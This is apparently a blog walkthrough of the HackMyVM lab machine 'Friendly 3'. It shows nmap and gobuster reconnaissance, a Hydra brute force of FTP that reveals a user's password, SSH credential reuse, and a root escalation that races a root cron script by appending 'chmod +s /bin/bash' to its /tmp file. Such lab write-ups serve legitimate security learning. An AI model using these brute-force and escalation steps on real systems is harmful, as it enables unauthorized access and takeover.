Friendly 3
Table of contents
We were really looking forward to another machine from the friendly series by our beloved buddy RiJaba1. From here, I want to express my gratitude, as always, to everyone who contributes to this fantastic community. As you already know from other times, I will leave his YouTube channel and the page for you to download this machine below the blog.
Summary
nmap
attack brute force
ftp content download
privilege escalation
Recognition
Nmap 7.93 scan initiated Wed Aug 23 10:20:22 2023 as: nmap -sSCV -p- --open --min-rate 4000 -vvv -n -Pn -oN escaneo 192.168.1.161
Nmap scan report for 192.168.1.161
Host is up, received arp-response (0.00084s latency).
Scanned at 2023-08-23 10:20:23 CEST for 12s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey:
| 256 bc463d8518bfc7bb14269a206cd33952 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFC2DVBfq6sqSsCS9Jg+TZN7bqZ4U5G/tKb5dD3M69VVHwPRuMmify8CmxFhlP33nMhZTvYSZIpjGuiPSjks5UA=
| 256 7b135a46a5623309249d3e67b6eb3fa1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICDxFT3mwConXgCXORTtuda6Onx3sMQgZb6CzY2tWc3l
80/tcp open http syn-ack ttl 64 nginx 1.22.1
|_http-title: Welcome to nginx!
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.22.1
MAC Address: 00:0C:29:04:53:C2 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug 23 10:20:35 2023 -- 1 IP address (1 host up) scanned in 12.75 seconds
As we can see from the nmap scan, ports 21, 22, and 80 are open. The first thing I checked was if access to the FTP service was enabled with the anonymous account, but it appears that it's not. So, let's take a closer look at port 80.
whatweb http://192.168.1.162http://192.168.1.162 [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.22.1], IP[192.168.1.162], Title[Welcome to nginx!], nginx[1.22.1]
We don't get much information, so let's go straight to see what the website contains.
We come across this here, and as we can see, the most relevant thing is the two users, both Juan and Sysadmin. Let's note down these names and continue investigating with some fuzzing to see if we can find anything else.
gobuster dir -u http://192.168.1.162 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.162
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2023/08/23 11:35:11 Starting gobuster in directory enumeration mode
===============================================================
===============================================================
2023/08/23 11:36:21 Finished
===============================================================
As we can see, we found absolutely nothing. If we look again at the nmap scan with the FTP and SSH services running and having two users in this case, Juan and Sysadmin, we can perform a brute force attack with Hydra. In this case, we will try with the FTP service.
hydra -l juan -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.162
[DATA] attacking ftp://192.168.1.162:21/
[21][ftp] host: 192.168.1.162 login: juan password: alexis
It worked, in this case we found Juan's password, let's log in.
ftp 192.168.1.162
We provide the username, in this case, Juan, and the password obtained earlier with Hydra. Once logged in, we find a ton of files. To download them all, we will use this command:
wget -r ftp://juan:alexis@192.168.1.162/
Once all files are downloaded, a folder will be created with the machine's IP address, and inside it will be all the files from the FTP service. We can use the tree command to display a tree structure, making it easier to visualize the contents of these files.
tree
.
├── file1
├── file10
├── file100
├── file11
├── file12
├── file13
├── file14
├── file15
├── file16
├── file17
├── file18
├── file19
├── file2
├── file20
├── file21
├── file22
├── file23
├── file24
├── file25
├── file26
├── file27
├── file28
├── file29
├── file3
├── file30
├── file31
├── file32
├── file33
├── file34
├── file35
├── file36
├── file37
├── file38
├── file39
├── file4
├── file40
├── file41
├── file42
├── file43
├── file44
├── file45
├── file46
├── file47
├── file48
├── file49
├── file5
├── file50
├── file51
├── file52
├── file53
├── file54
├── file55
├── file56
├── file57
├── file58
├── file59
├── file6
├── file60
├── file61
├── file62
├── file63
├── file64
├── file65
├── file66
├── file67
├── file68
├── file69
├── file7
├── file70
├── file71
├── file72
├── file73
├── file74
├── file75
├── file76
├── file77
├── file78
├── file79
├── file8
├── file80
├── file81
├── file82
├── file83
├── file84
├── file85
├── file86
├── file87
├── file88
├── file89
├── file9
├── file90
├── file91
├── file92
├── file93
├── file94
├── file95
├── file96
├── file97
├── file98
├── file99
├── fold10
├── fold11
├── fold12
├── fold13
├── fold14
├── fold15
├── fold4
├── fold5
│ └── yt.txt
├── fold6
├── fold7
├── fold8
│ └── passwd.txt
├── fold9
└── fole32
We didn't find much relevant information, RiJaba1 really trolled us well hahahaha
ncat passwd.txt
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⠛⠛⠛⠋⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠙⠛⠛⠛⠿⠻⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀⠀⡀⠠⠤⠒⢂⣉⣉⣉⣑⣒⣒⠒⠒⠒⠒⠒⠒⠒⠀⠀⠐⠒⠚⠻⠿⠿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⠏⠀⠀⠀⠀⡠⠔⠉⣀⠔⠒⠉⣀⣀⠀⠀⠀⣀⡀⠈⠉⠑⠒⠒⠒⠒⠒⠈⠉⠉⠉⠁⠂⠀⠈⠙⢿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⠇⠀⠀⠀⠔⠁⠠⠖⠡⠔⠊⠀⠀⠀⠀⠀⠀⠀⠐⡄⠀⠀⠀⠀⠀⠀⡄⠀⠀⠀⠀⠉⠲⢄⠀⠀⠀⠈⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⠋⠀⠀⠀⠀⠀⠀⠀⠊⠀⢀⣀⣤⣤⣤⣤⣀⠀⠀⠀⢸⠀⠀⠀⠀⠀⠜⠀⠀⠀⠀⣀⡀⠀⠈⠃⠀⠀⠀⠸⣿⣿⣿⣿
⣿⣿⣿⣿⡿⠥⠐⠂⠀⠀⠀⠀⡄⠀⠰⢺⣿⣿⣿⣿⣿⣟⠀⠈⠐⢤⠀⠀⠀⠀⠀⠀⢀⣠⣶⣾⣯⠀⠀⠉⠂⠀⠠⠤⢄⣀⠙⢿⣿⣿
⣿⡿⠋⠡⠐⠈⣉⠭⠤⠤⢄⡀⠈⠀⠈⠁⠉⠁⡠⠀⠀⠀⠉⠐⠠⠔⠀⠀⠀⠀⠀⠲⣿⠿⠛⠛⠓⠒⠂⠀⠀⠀⠀⠀⠀⠠⡉⢢⠙⣿
⣿⠀⢀⠁⠀⠊⠀⠀⠀⠀⠀⠈⠁⠒⠂⠀⠒⠊⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⢀⣀⡠⠔⠒⠒⠂⠀⠈⠀⡇⣿
⣿⠀⢸⠀⠀⠀⢀⣀⡠⠋⠓⠤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠄⠀⠀⠀⠀⠀⠀⠈⠢⠤⡀⠀⠀⠀⠀⠀⠀⢠⠀⠀⠀⡠⠀⡇⣿
⣿⡀⠘⠀⠀⠀⠀⠀⠘⡄⠀⠀⠀⠈⠑⡦⢄⣀⠀⠀⠐⠒⠁⢸⠀⠀⠠⠒⠄⠀⠀⠀⠀⠀⢀⠇⠀⣀⡀⠀⠀⢀⢾⡆⠀⠈⡀⠎⣸⣿
⣿⣿⣄⡈⠢⠀⠀⠀⠀⠘⣶⣄⡀⠀⠀⡇⠀⠀⠈⠉⠒⠢⡤⣀⡀⠀⠀⠀⠀⠀⠐⠦⠤⠒⠁⠀⠀⠀⠀⣀⢴⠁⠀⢷⠀⠀⠀⢰⣿⣿
⣿⣿⣿⣿⣇⠂⠀⠀⠀⠀⠈⢂⠀⠈⠹⡧⣀⠀⠀⠀⠀⠀⡇⠀⠀⠉⠉⠉⢱⠒⠒⠒⠒⢖⠒⠒⠂⠙⠏⠀⠘⡀⠀⢸⠀⠀⠀⣿⣿⣿
⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠑⠄⠰⠀⠀⠁⠐⠲⣤⣴⣄⡀⠀⠀⠀⠀⢸⠀⠀⠀⠀⢸⠀⠀⠀⠀⢠⠀⣠⣷⣶⣿⠀⠀⢰⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠁⢀⠀⠀⠀⠀⠀⡙⠋⠙⠓⠲⢤⣤⣷⣤⣤⣤⣤⣾⣦⣤⣤⣶⣿⣿⣿⣿⡟⢹⠀⠀⢸⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣧⡀⠀⠀⠀⠀⠀⠀⠀⠑⠀⢄⠀⡰⠁⠀⠀⠀⠀⠀⠈⠉⠁⠈⠉⠻⠋⠉⠛⢛⠉⠉⢹⠁⢀⢇⠎⠀⠀⢸⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣀⠈⠢⢄⡉⠂⠄⡀⠀⠈⠒⠢⠄⠀⢀⣀⣀⣰⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⢀⣎⠀⠼⠊⠀⠀⠀⠘⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⡀⠉⠢⢄⡈⠑⠢⢄⡀⠀⠀⠀⠀⠀⠀⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠁⠀⠀⢀⠀⠀⠀⠀⠀⢻⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣀⡈⠑⠢⢄⡀⠈⠑⠒⠤⠄⣀⣀⠀⠉⠉⠉⠉⠀⠀⠀⣀⡀⠤⠂⠁⠀⢀⠆⠀⠀⢸⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣄⡀⠁⠉⠒⠂⠤⠤⣀⣀⣉⡉⠉⠉⠉⠉⢀⣀⣀⡠⠤⠒⠈⠀⠀⠀⠀⣸⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣤⣄⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣶⣶⣶⣤⣤⣤⣤⣀⣀⣤⣤⣤⣶⣾⣿⣿⣿⣿⣿
Let's try reusing Juan's credentials for the SSH service after seeing that there isn't much in the FTP service.
ssh juan@192.168.1.162
juan@friendly3:~$
Privilege Escalation
We were able to access with the user Juan via SSH after looking for a while to see how I could escalate privileges, but I couldn't find anything. So, I downloaded pspy to see which tasks are running automatically on the system every x amount of time.
Once downloaded, we set up a server with Python on our machine, and on the victim machine, we download it using curl because wget is not installed.
python3 -m http.server 80
and on the victim machine, we download it using curl
curl -O http://192.168.1.108/pspy32
give execution permissions to the file with the chmod command
chmod +x pspy32
y ejecutamos el archivo
./pspy32
We let it run for a couple of minutes and it finds this.
023/08/23 07:56:01 CMD: UID=0 PID=967 | /bin/sh -c /opt/check_for_install.sh
2023/08/23 07:56:01 CMD: UID=0 PID=968 | /bin/bash /opt/check_for_install.sh
2023/08/23 07:56:02 CMD: UID=??? PID=969 | ???
2023/08/23 07:56:02 CMD: UID=0 PID=970 | chmod +r /tmp/a.bash
2023/08/23 07:56:02 CMD: UID=0 PID=971 | chmod +w /tmp/a.bash
2023/08/23 07:56:02 CMD: UID=0 PID=972 | /bin/bash /tmp/a.bash
As we can see, it is executing a script every minute that is in the opt directory, let's see what it is about.
#!/bin/bash
/usr/bin/curl "http://127.0.0.1/9842734723948024.bash" > /tmp/a.bash
chmod +x /tmp/a.bash
chmod +r /tmp/a.bash
chmod +w /tmp/a.bash
/bin/bash /tmp/a.bash
rm -rf /tmp/a.bash
This script downloads a file from a web location, gives it execution, read, and write permissions, runs it as a Bash script, and then deletes the downloaded file.
What we can do is create a script that uses a loop to make /bin/bash setuid, and thus elevate our privileges to root. Let's see it.
We create the script nano inject.sh and add that code, which is a loop that will grant permissions to the bash to make it setuid and elevate our privileges.
while true; do
echo "chmod +s /bin/bash" >> /tmp/a.bash
done
We give it execution permissions with chmod
chmod +x inject.bash
We run it and leave it for a couple of minutes.
./inject.sh
If you're as impatient as I am, you can open another terminal and connect again via ssh with the user Juan and enter this command to monitor the /bin/bash every second to see when the permissions change.
watch -n 1 ls -l /bin/bash
Every 1.0s: ls -l /bin/bash friendly3: Wed Aug 23 08:25:08 2023
-rwsr-xr-x 1 root root 1265648 Apr 23 17:23 /bin/bash
As we can see, the permissions have already changed and added that 's' which makes the bash now suid. Finally, let's elevate privileges by taking advantage of this condition.
juan@friendly3:~$ bash -p
bash-5.2# whoami
root
conclusion
A very cool machine, thanks once again to RiJaba1 for making another great machine, thanks for your time buddy, and thanks to the community as always. Here's RiJaba1's YouTube channel where he uploads awesome content, and of course, the HackMyVM website so you can try this machine or any other one you choose. Thanks for reading and happy Hackinggg!!!
Subscribe to my newsletter
Read articles from Condor directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by